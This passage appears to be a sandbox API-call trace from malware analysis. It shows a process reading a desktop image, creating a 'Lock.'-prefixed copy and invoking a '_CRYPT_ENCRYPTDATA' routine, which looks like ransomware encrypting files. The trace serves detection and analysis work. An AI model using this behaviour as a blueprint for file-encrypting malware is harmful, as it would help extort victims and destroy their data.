dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0135.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0135.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0135.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0135.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0135.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f26008 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0135.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0135.965] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/alm7UiDYbRcNr.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\alm7uidybrcnr.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0135.966] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.966] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0135.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0135.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0135.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0135.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0135.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0135.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0135.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0135.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0135.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0135.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0135.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0135.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0135.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0135.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0135.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.967] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0135.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0135.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f36010 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0135.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.968] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.alm7UiDYbRcNr.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.alm7uidybrcnr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0135.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0135.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0135.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0135.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0135.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0135.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0135.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0135.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0135.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0135.968] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.968] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0135.969] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.969] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0135.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0135.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0135.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0135.972] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0135.972] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f26008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f26008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0135.975] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f26008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f26008*, lpNumberOfBytesRead=0x8cf4f8*=0x66f2, lpOverlapped=0x0) returned 1 [0135.976] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f26008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f26008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0135.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0135.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0135.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0135.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bed020 | out: hHeap=0x970000) returned 1 [0135.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0135.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0135.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0135.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0135.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0135.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0135.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.986] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0135.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0136.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0136.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0136.154] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0136.154] TranslateMessage (lpMsg=0x8cf708) returned 0 [0136.154] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0136.155] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0136.155] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0136.155] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0136.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0136.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0136.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0136.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0136.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0136.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0136.155] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0136.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0136.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0136.155] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0136.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0136.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0136.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0136.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0136.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0136.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0136.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f2) returned 0x2e80330 [0136.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0136.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0136.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0136.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0136.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0136.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0136.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f2) returned 0x2ead130 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0136.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0136.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0136.163] PeekMessageW (in: lpMsg=0x8cf3b8, 